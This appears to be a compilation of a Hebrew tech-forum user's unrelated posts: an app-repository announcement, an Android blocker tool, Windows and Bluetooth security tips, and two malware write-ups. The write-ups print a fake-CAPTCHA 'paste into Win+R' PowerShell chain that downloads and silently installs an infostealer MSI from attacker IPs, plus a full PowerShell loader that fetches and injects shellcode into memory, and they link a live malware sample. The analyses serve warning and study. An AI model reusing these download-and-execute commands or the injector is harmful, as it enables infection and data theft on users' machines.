למעבר לאתר

טוב ראיתי צורך בכך שיש אפליקציות שמצריכות עריכה כולשהיא לאמולטור, לרוט, לעבוד עם נטפרי,או סתם כך לגרסה כשרה ועוד ועוד,
ואנשים טובים פה מעלים גרסאות ערוכות לטובת הציבור, עד כאן הכול לכאורה הכול טוב ויפה אלא מה,
ברגע שיוצאת גרסה חדשה צריך לערוך שוב / לא מוצאים את האפליקצייה שחיפשת ועוד ועוד.

בקיצור הכנתי פתרון תקראו לזה חנות תקראו לזה מאגר הפתרון פשוט,
עורכים את האפליקציה פעם אחת שולחים pr עם השינויים והמערכת מטפלת בהכול משם מעדכנת בקביעות תוך שמירת השינויים.

בעתיד אם יהיה ביקוש נשתדל להוסיף כמה שיותר אפליקציות לטובת מי שצריך עריכות שונות.

ולציבור המורידים הכול זמין ישירות באתר.

כמה פרטים לדעת:
המאגר הוא פתוח לצפייה ולשימוש, אך חל איסור מוחלט על שימוש למטרות מסחריות מכול סוג שהוא!.
הפוריקט מוגן תחת רישיון Creative Commons BY-NC-SA 4.0 ואין לחרוג מגבולותיו כלל וכלל.

האפליקציות מתעדכנות אוטומטית בתוך האפליקצייה עצמה (תקבלו התראה שיש עדכון חדש)תודה ל @lilo159 .

חלק מהאפליקציות עוברות עריכה אוטומטית בנוסף לשאר העריכות עבור הוספת תמיכה בתעודות נטפרי ושאר סינונים.

במידה ואתם רוצים אפליקצייה כולשהיא שמצריכה עריכה ואתם חושבים שהיא תועיל לעוד,
יש כפתור למעלה באתר תוכלו שם להגיש בקשה מסודרת תודה.

אם יש לכם אפליקצייה שלא שימושית לכולם אב עדיין מצריכה תמיכה לנטפרי תוכלו להשתמש בתוכנה כאן.

במידה ואתם מעלים אפליקצייה בבקשה תעקבו אחר ההוראות על מנת שתעלו pr תקין שקל לשלב.

עד כאן, תהנו.

תודה למי שתרם עד כה @ע-ה-דכו-ע ו @lilo159 .

לגיטהאב: https://github.com/cfopuser/app-store

להגשת בקשת אפליקצייה: https://github.com/cfopuser/app-store/issues/new?template=new-app-request.yml

שימו לב בשרשור זה מובאים קבצים מסוכנים! נלקחו לא מעט צעדים כדי לסננם ולהגן עליהם מפני הורדה מוטעת

אך עדיין חובת האזהרה כאן

בהמשך לשרשור הזה, הבאתי כאן את עיקרי הדברים ממה שעברתי על הוירוס.

Spoiler

אז בואו נעשה סדר בתהליך התקיפה, שלב אחר שלב.

שלב 1: ההדבקה/ההידבקות הראשונית.

הכל מתחיל כשהקורבן מתבקש באתר לאמת את זהותו על ידי הדבקת פקודה לחלון Win + R.

Spoiler

הפקודה הזאת זה ההתחלה:

powershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.171:5506/clo.txt'));I am not a bot - Verification ID: #8626                  )

הפקודה הזו מריצה PowerShell בחלון מוסתר (-wi mi) ומורידה ומפעילה תוכן מקובץ clo.txt מהשרת של התוקף.

בתוך הקובץ clo.txt אנו מוצאים את הקוד הבא:

$u='http://84.21.189.171:5506/wir.txt'
$i='Invoke-WebRequest'
$e='Invoke-Expression'
$r=& $i -Uri $u -UseBasicParsing
& $e $r.Content

הסקריפט הזה פשוט מוריד ומריץ את השלב הבא בשרשרת: הקובץ wir.txt.
הקובץ wir.txt מכיל את הקוד הסופי של שלב ההדבקה:

&{$u='http://84.21.189.171:5506/JDYQAKRR.msi';$p="$env:TEMP\s$(Get-Random).msi";(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process msiexec.exe -Args @('/i',"`"$p`"",'/qn','/norestart') -WindowStyle Hidden -Wait;Remove-Item $p -Force}

הסקריפט הזה מוריד קובץ JDYQAKRR.msi לתיקיית ה-TEMP תחת שם אקראי, מתקין אותו בשקט (/qn) ובחלון מוסתר, ואז מוחק את קובץ ההתקנה כדי לטשטש עקבות.
עכשיו אנחנו מגיעים לחלק עם הבשר הווירוס עצמו.

שלב 2: במבט מלמעלה

הנה הקובץ בשביל מי שרוצה, סיסמה infected
malware_sample.msi.7z

זהירות קובץ מסוכן!!

לאחר חילוץ ה-MSI, מתגלה לנו מבנה התיקיות הבא:

msi-extracted
│   malware_sample.msi
│
└───Layperson
        Cieg.keac
        Croort.jga
        D_Droid.exe
        mfc110u.dll
        MSVCP110.dll
        MSVCR110.dll
        sciter32.dll
        zpsres.US.dll

מה שישר תופס את תשומת הלב זהו הקובץ D_Droid.exe. החשד המיידי נפל עליו.
העלאתו ל-VirusTotal מגלה שהוא חומק בקלות רבה מאנטי-וירוסים שונים. דבר מדאיג ומזר בהחלט (לפחות בהווא אמינא).

עכשיו ביליתי לא מעט זמן עובר על הקובץ מוצא לופים של הצפנה והרגשתי קרוב,
למרות זאת לא מצאתי שום דבר אמיתי ממה שחיפשתי לא הרצה של payload לא קריאות מוזרות לשרתים, כלום.

בנוסף על כול זה גם virustotal החזיר בדיקה נקייה,
בשלב הזה בדקתי את הפרטים של הקובץ וראיתי להפתעתי שהקובץ חתום ומסתבר שהוא איננו זדוני.
כך שסתם ביזבזתי את הזמן עליו (נלמד להבא...)

למעשה מבדיקה קלה של הקובץ אנחנו יכולים לראות שיש לנו עסק
עם תוכנה חתומה ורגילה בשם Zoner Photo Studio 18

אז אחרי כול זה (שמסתבר שעקבתי אחרי המפתחות רישיון של התוכנה במקום את של הוירוס).
צריך להבין אז מה קורה כאן בעצם?

שלב 3: אז איפה הוירוס נמצא?

עכשיו ששללנו את הexe,
מה שהוביל אותי למסקנה שהוירוס טמון כנראה בדבר שנקרא dll swapping (החלפת dll)
בעיה שמשפיעה גם בוירוסים וגם תוקפת בחוזקה כאשר מפתחים קיוסק תורני.

כלומר יש קובץ dll זדוני בתוך הקבצים שלנו שמתחזה לאחד מהקבצים הרגילים כך
שברגע שהתוכנה קוראת לו הוא נכנס לפעולה ומפעיל את השלב הבא של הוירוס,
זה אומר שיש כאן מתחזה, השאלה היא רק מי הוא.

בהסתכלות על מערכת הקבצים אנחנו יכולים לראות מספר דברים:

• MSVCP110.dll, MSVCR110.dll: קבצי סביבת ריצה סטנדרטיים של ++C (MFC ו).
• sciter32.dll: ספרייה לרינדור ממשקי משתמש מבוססי HTML.
• zpsres.US.dll: קובץ משאבים של התוכנה. (וגם מכיל תמונה מוזרה של תוכי משום מה! )
• mfc110u.dll: זהו קובץ השייך לספריית MFC של מיקרוסופט. שבמבט ראשון נראה תקין, אבל בבדיקה מעמיקה יותר, מתגלה שהקובץ אכן חתום אבל פגום, והחתימה שווה כקליפת השום.

Spoiler

• יש את שני הקבצים Croort.jga (21KB) ו Cieg.keac (2.5mb) שניהם מהסתכלות מלמעלה נראים מוזרים,
  הקובץ מחתחיל עם לא מעט מחרוזות טקסט חסרות פשר ואז מגיע למקטע IDAT (מקטע מידע בקובץ Png),
  סריקה בbinwalker לא הולידה פירות כך שאנחנו מתעסקים כנראה עם קובץ מוצפן או לא מוגדר (סריקת entropy מראה על נתונים סבירים אבל היא משתנה ברגע שמורידים את כול הטקסט בהתחלה).
  מה שמוביל להנחה שהם השלב הבא.

שלב 4: פענוח הPayload

כדי לפענח אותם, יצרתי סקריפט עם ai שסורק קומבינציות הצפנה שונות בחיפוש אחר המחרוזת http://. הסריקה העלתה שהקבצים "הוצפנו" באמצעות XOR, והמפתח הוא F9A7E67E.

לאחר הפענוח, קיבלנו קובץ שמכיל בתחילתו את הטקסט המוכר: "This program cannot be run in DOS mode". זוהי אינדיקציה ברורה שאנחנו מתעסקים עם קובץ הרצה (EXE או DLL וטכנית גם sys). למרות זאת, הקובץ המפוענח עדיין לא מזוהה למרות שסוגרים אותו וכו'.

אז עד כאן הגעתי איתרתי לא מעט כתובות שהתוכנה קוראת להם חלקם לא רשומות וחלקם לא זמינות לפחות ממה שניסיתי.

אני ישתדל להמשיך את המחקר בזה מי שרוצה מוזמן להמשיך פה בנושא בהצלחה.

Spoiler

סיכום

• זוהי מתקפה די ידועה ודי אפקטיבית,
  אם נפלתם בה ההמלצה המידית היא לכבות את המחשב לגבות את כול הנתונים מגרסת live ולפרמט.

• בנוסף יש לשנות את הסיסמאות בכול החשבונות שיש לכם,
  ולדאוג להתנתק מהחיבורים הנוכחים שי לכם ליתר ביטחון.

• בנוסף אין להשתמש יותר בסיסמאות שהשתשמתם בהן בכול חשבון שהוא בשעת הפריצה.
  או לכול הפחות לא תחת אותה כתובת מייל.

• במידה ואין לכם ידע בנושא יש לפנות לבעל מקצוע.

TL;DR/אמלוק

וירוס infostealer סטנדרטי
אהבתי את איך שהוא הזריק את עצמו יש טיפה fuzzing
לא יודע אם זה עקיצה מכוונת שהשם של התיקייה זה layperson
סך הכול נחמד יש עוד לראות ולבדוק מוזמנים.

Spoiler

עריכה: נראה שהוירוס הוא אכן infostealer כולשהוא,
והקבצי payload שפיענחנו הופכים לקובץ exe חתום בסופו של דבר (שזה הרבה כסף)
הקובץ חתום תחת שם של אדם / חברה שכנראה אין להם קשר לעניין חוץ מהועבדה שרשיונם נגנב וכבר משמש מספר פעמים כדי להפיץ וירוסים כאלה,
מבדיקה נראה שזה משמש בכמה תקיפות הרישיון הזה והכול בהקשר של Lume stealer,
(גם במקרה דומה שהובא פה בפורום זה הם בסופו של דבר)

בסופו של דבר יוצא קובץ חדש שהוא הוירוס עצמו שעושה את כול מה שתצפו גונב מידע וכו' רק חשבתי להזכיר את זה שזה חתום זה היה מציאה די מעניינת.

להנדס את הוירוס עצמו אולי אני יעשה בעתיד אם אני ימצא לזה זמן או כול אחד אחר מוזמן לעשות את זה.

כשמו כן הוא אתר פשוט ומהיר להתקנת חסימת a bloq של @iosi-poli
לבינתיים זה בבטא כי יש כמה שינויים שאני רוצה להכניס,
אבל לבינתיים זה מספיק בשל לדעתי כדי לפרסם.

היתרונות גדולים אין צורך בהתקנה אין צורך בהסרת חשבונות ועוד.

למעבר לאתר

תמונות

Spoiler

אשמח לשמוע הערות והארות.
תהנו.

שאלות נפוצות:

• ש. האתר מראה הודעה שהדפדפן לא נתמך, מה זה אומר?

ת. הדפדפן שלכם לא תומך בחיבור מכשירי usb דרך הדפדפן אנא השתמשו בדפדפן אחר.

• ש. מה זה אומר התקנה ללא הסרה?

ת. זהו פיצ'ר ניסיוני אשר מאפשר להתקין את החסימה ללא, הסרה של חשבונות.

• ש. האתר מציג הודעה של "פעולה זו אינה זמינה באנדרואיד 14+", מה זה אומר?
  ת. כחלק מעדכוני גוגל שונתה הדרך שבדיקת חשבונות פועלת עקב כך התקנה ללא הסרה אינה זמינה במכשירים אלו.
  יש להסיר ידנית את כלל החשבונות.

• ש. האתר לא מצליח להתחבר למכשיר ומציג הודעת שגיאה, מה לעשות?
  ת. נסו את כלל האפשרוית הבאות.

1. ודאו שהמכשיר פתוח ושאתם מאשרים את ההודעה במכשיר.
2. נתקו וחברו את המכשיר, ורעננו את האתר.
3. ודאו שהאתר לא פתוח במקום נוסף.
4. במידה וadb מותקן במחשבכם או/ו יש תוכנה עםadb שמותקנת,
   כבו את adb הנ"ל עם הפקודה

adb kill-server

@מישהו12 כתב בשאלה | אזהרה! תיזהרו מהורדה של תוכנות! פירצה חדשה בווינדוס:
בלינוקס זה לא היה קורה

@שניאור-שמח כתב בשאלה | אזהרה! תיזהרו מהורדה של תוכנות! פירצה חדשה בווינדוס:
וגם במק

יש שני סוגים של מערכות הפעלה: אלו שכולם מתלוננים עליהן ואלו שאף אחד לא משתמש בהן

תוכנת התקנה

כדי להקל על אלו שרוצים להשתמש באפליקצייה אבל לא רוצים להתקין adb ולוודא שיש להם את הגרסה העדכנית
חשבונות וכו'

הכנתי תוכנת התקנה שבאה עם הוראות סרטוני הדרכה ועדכון אוטמטי בהצלחה

התוכנה זמינה כעת רק לווינדוס תמיכה למק ולינוקס תבוא בהמשך

אשמח אם יעדכנו אם יש באגים וכו'

להורדה https://drive.google.com/file/d/1r****BjWLHM0FWQqE5dUBcGr7Z-vDtA-UZ07/view?usp=sharing

להוריד כוכביות

Spoiler

להורדה (הפוריקט עבר דירה)

טוב ראיתי שיש בעיה בעניין אז יצרתי את הפרויקט הזה,
באתר המקושר למעלה תתעדכן אוטומטית הגרסה העדכנית ביותר עם התיקון.

במקרה שביט יעשו שינויים אשר יפגעו בתיקון תוצג הודעה מסודרת באתר,
ואני ישתדל למצוא את הזמן לסדר את זה.

קישור לעדכון webview למכשירים ישנים כאן.

עד כאן, תהנו.

Spoiler

@נחלס-דון כתב בהמלצה | הפתעה לבעלי JELLY STAR - עידכון לאנדרואיד 16!!:

אני רק לא מבין איך טכנית אפשר לעשות כזה שידרוג,
כשניסיתי לערוך גירסה לm36 חלמתי על אנדרואיד16 ואז גיליתי שבקושי אנדרואיד15 אפשר וגם אז בלי בלוטוס וכו’ בגלל הדרייברים, אז איך פה משדרגים ל16, (ואם הם משדרגיםגם את הדרייברים, מה הבעיה לעשות את זה בm36??)

תשאל שאלה יותר קיומית,
איך הם בכלל בנו את המכשיר, בלי דרייברים הרי כידוע דריברים נוצרו בערב שבת בין השמשות.

Spoiler

בהמשך לשרשור פה

הוכנה כאן גרסה לווינדוס,
הגרסה מתבססת על העבודה הראשונית של @איש-אמת.

אשמח לדיווח על באגים כולשהם, או בקשות פיצ'רים.

להורדה

להורדת מסד הנתוונים (מאגר) https://drive.google.com/file/d/1j8M-BAn32eifw*******dYXrJb9u0Wb8sIXRYGC
יש לחלץ את המאגר לפני השימוש.

Spoiler

תהנו.

לאחר שמייקרוסופט מחקו בעדכון האחרון הרבה מהדרכים הידעות להתקין את ווינדוס ללא אינטרנט (פקודות בטרמינל וכו')

להלן הדרך הכי קלה שנשארה:

עבור משתמשי ווינדוס פרו בלבד עקבו אחר הצעדים האלה:

בחלון הראשון בחרו ליצור חשבון לימודים/עבודה (סמל של מזוודה)

Spoiler

עברו לחלון הבא שם מתחת לתיבת הטקסט עבור המייל לחצו על אפשרויות כניסה נוספות:

Spoiler

ולאחר מיכן לחצו על האפשרות השנייה של כניסה באמצעות דומייין (סמל של ענן חסום):

Spoiler

מכאן והלאה המשיכו בתהליך היצירה כרגיל,
שם משתמש, סיסמה וכו'.

זה הדרך הכי פשוטה כנראה מלבד ליצור חשבון מקומי מראש בתוכנות שונות.

לאחרונה נתגלתה פרצה בפרוטוקול fast pair של גוגל שקייים כמעט בכול אוזניות בלוטוס המתקדמות
הפרצה נגרמה עקב כך שיצרנים לא השתמשו בפרוטוקול כראוי
(האוזניות אמורת להימנע מבקשות ממכשירים זרים כאשר הם לא במצב pair מה שלא קרה בכמעט כול האוזניות והמכשירים)

כדי להבין כמה חמורה הפרצה,
היא מאפשרת השתלטות על השמע, (תוכלו להשמיע כול דבר בפול וליום)
תוכלו לדוג' להאזין למיקרופון,
והחמור מכול אם המכשיר לא מחובר לחשבון גוגל כולשהוא תוקפים יכולים לחבר אותו לחשבון שלהם ולהתחיל לאכן אתכם באמצעות find my של גוגל.

לבינתיים אין patch כללי וצריך לבדוק כול דגם וחברה בנפרד.
ולעדכן את המכשירים במידת האפשר.

יש כאן אתר שמכיל רשימה של מכשירים שנמצאו פכיעים (גם אם אתם לא ברשימה זה לא אומר שהמכשיר לא פגיע)
https://whisperpair.eu/vulnerable-devices
האתר הוא חלקי ומכיל רק מעט דגמים אבל פשוט לבדוק אם המכשיר שלכם תומך בgoogle fast pair וכנראה הוא פגיע.

Spoiler

חשוב לומר פריצה ללא אישור וקו"ח שהפעלת איכון ללא אישור מפורש על מכשירי בלוטוס זרים זוהי עבירה על החוק.
כול האמור כאן הוא למטרות ידע בלבד.

@ע-ה-דכו-ע באמת יש דברים בגו.

אז אם אתה רוצה אני ישתף אותך טיפה שכבר חשבתי על הנושא הזה,

פעם שעבדתי על מודל שיסנן תמונות ואמרתי לעצמי שזה לא משנה שזה חלק מהפיתוח, המטרה לא מקדשת את האמצעים.

וב"ה מצאתי פיתרון והוא שאני שם את התמונות על הגודל הכי קטן ופשוט מביא לai בלי להסתכל את התוכן, מקבל תיאור מילולי של התמונה.
לאחמ"כ אם היא מצריכה הכשרה אני אומר לו שיסיר את האנשים ומוריד את הקובץ ומחליף.

אני אפילו לא פותח את האפליקצייה רק לאחר שהכשרתי אני פותח כדי לראות שהכול עובד.

זה אחרי טיפה עבודה עם ai יצא נחמד לדעתי,
אם יש הערות הארות כולשהן וכו'(עיצוב זה לא הצד החזק שלי ).

https://cfopuser.github.io/A-bloq-site/

אז כן, מי שלא שמע: חברת גוגל יצאה בהודעה שמכשיריה מסדרת Pixel 10 יתמכו כעת בשיתוף קבצים עם מכשירי אפל. המהלך מתבצע על ידי שימוש בפרוטוקול AirDrop, שעד לפני מספר ימים היה בלעדי לשימוש במכשירי אפל.

והדבר המפתיע הוא שזה אינו שיתוף פעולה בין החברות, אלא תעוזה של גוגל שניתחה את הפרוטוקול וגרמה לכך שמכשירי אפל רואים את הפיקסל כמכשיר אפל נוסף.

גוגל הודיעה בנוסף שהיא תתמוך גם ב"שיתוף קרבה" (פיצ'ר נוסף של אפל, המאפשר קירוב שני מכשירים זה לזה לשיתוף אנשי קשר קבצים ועוד).

והקטע המפתיע באמת (לפחות אותי): גוגל יצאה במגוון הודעות על כך שהשיתוף מאובטח לחלוטין – לא מעקף ולא כלום. לעת עתה, הפיצ'ר זמין רק במכשירי הדגל של החברה (הפיקסל 10) ורק למכשירים חדשים.

אפל עדיין לא הגיבה על המהלך, אבל ייתכן שמכיוון שגוגל משחררת את הפיצ'ר רק באירופה, החברה מוגנת חוקית.

בלוג אבטחה של גוגל (למעוניינים בניתוח הפרוטוקול):
https://www.netspi.com/wp-content/uploads/2025/11/google-feature-review-report.pdf

כתבה של The Verge:
https://www.theverge.com/news/825228/iphone-airdrop-android-quick-share-pixel-10

אקדים ואומר זה מכיל פקודות זדוניות נא להפעיל ראש לפני שסתם עושים דברים,
אחרת אני לא אחראי על חוסר האחריות שלכם.

Spoiler

powershell -c iex(irm 158.94.208.86 -UseBasicParsing)

try {
    $bjIpBGrKhSw = @'
try {
    $checkResult = Invoke-WebRequest -Uri "http://158.94.208.92" -UseBasicParsing
    Invoke-Expression $checkResult.Content
} catch {
}
'@

    $nwlOLRnbTJHJGuIzB = New-Object System.Diagnostics.ProcessStartInfo
    $nwlOLRnbTJHJGuIzB.FileName = "powershell.exe"
    $nwlOLRnbTJHJGuIzB.Arguments = "-Command " + [char]34 + $bjIpBGrKhSw + [char]34
    $nwlOLRnbTJHJGuIzB.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden
    $nwlOLRnbTJHJGuIzB.CreateNoWindow = $true
    $nwlOLRnbTJHJGuIzB.UseShellExecute = $false

    $PmgaQrhIGPERnniVQ = New-Object System.Diagnostics.Process
    $PmgaQrhIGPERnniVQ.StartInfo = $nwlOLRnbTJHJGuIzB
    $PmgaQrhIGPERnniVQ.Start() | Out-Null
} catch {
}

$qfxynVtaoWkTGXPO = "http://158.94.208.104/x7GkP2mQ9zL4/my_l.bin"
try {
    $wkjmvrrQYG = Invoke-WebRequest -Uri $qfxynVtaoWkTGXPO -UseBasicParsing -ErrorAction Stop
    $fxfUCqgKMKyq = $wkjmvrrQYG.Content
    $jQYxAVfWTktBrihYMu = $fxfUCqgKMKyq.Length
    $oifeVAXruKV = @"
using System;
using System.Runtime.InteropServices;
public class xKuKzcdScrPfQpehRq {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr VirtualAlloc(IntPtr a, uint sz, uint t, uint p);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf, out uint tid);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern uint WaitForSingleObject(IntPtr h, uint ms);
}
"@
    Add-Type -TypeDefinition $oifeVAXruKV
    $LDeyMEWUGUaRBLR = 0x1000
    $YMnLUdAdCBUqtPwzZe = 0x2000
    $NfbibNbjY = 0x40
    $VJzynl = [xKuKzcdScrPfQpehRq]::VirtualAlloc([IntPtr]::Zero, $jQYxAVfWTktBrihYMu, $LDeyMEWUGUaRBLR -bor $YMnLUdAdCBUqtPwzZe, $NfbibNbjY)
    if ($VJzynl -eq [IntPtr]::Zero) { throw "Alloc failed" }
    [System.Runtime.InteropServices.Marshal]::Copy($fxfUCqgKMKyq, 0, $VJzynl, $jQYxAVfWTktBrihYMu)
    $RcgZSyj = 0
    $cDVcAqtqupLLT = [xKuKzcdScrPfQpehRq]::CreateThread([IntPtr]::Zero, 0, $VJzynl, [IntPtr]::Zero, 0, [ref]$RcgZSyj)
    if ($cDVcAqtqupLLT -eq [IntPtr]::Zero) { throw "Thread failed" }
    [xKuKzcdScrPfQpehRq]::WaitForSingleObject($cDVcAqtqupLLT, 30000) | Out-Null
    Write-Host "done."
}
catch {
    exit 1
}

Spoiler

אני מקבל pr לפרויקט (הקוד בגיטהאב לא מעודכן עדיין לא לעבוד עליו)
אז כול מי שרוצה לתרום מוזמן,
ואולי גם אני יוסיף דברים לאחר ש @iosi-poli יסיים עם העדכון הנוכחי.

@מישהו12 הפתרון שעבד לי פעם זה פשוט ללכת לנתיב של אדובי

| c:\Program Files\Adobe\

ולמחוק את התקייה Adobe Creative Cloud Experience

האופצייה הנוספת
זה ללכת תזמון המשימות (task scheduler)
ולבחור בצד שמאל Adobe CCX
ולמחוק את התזמון של Adobe CCX

שניהם כנראה יעבדו

Spoiler

שורש הבעיה שאדובי לא מוחקת הכול כאשר מסירים את התוכנה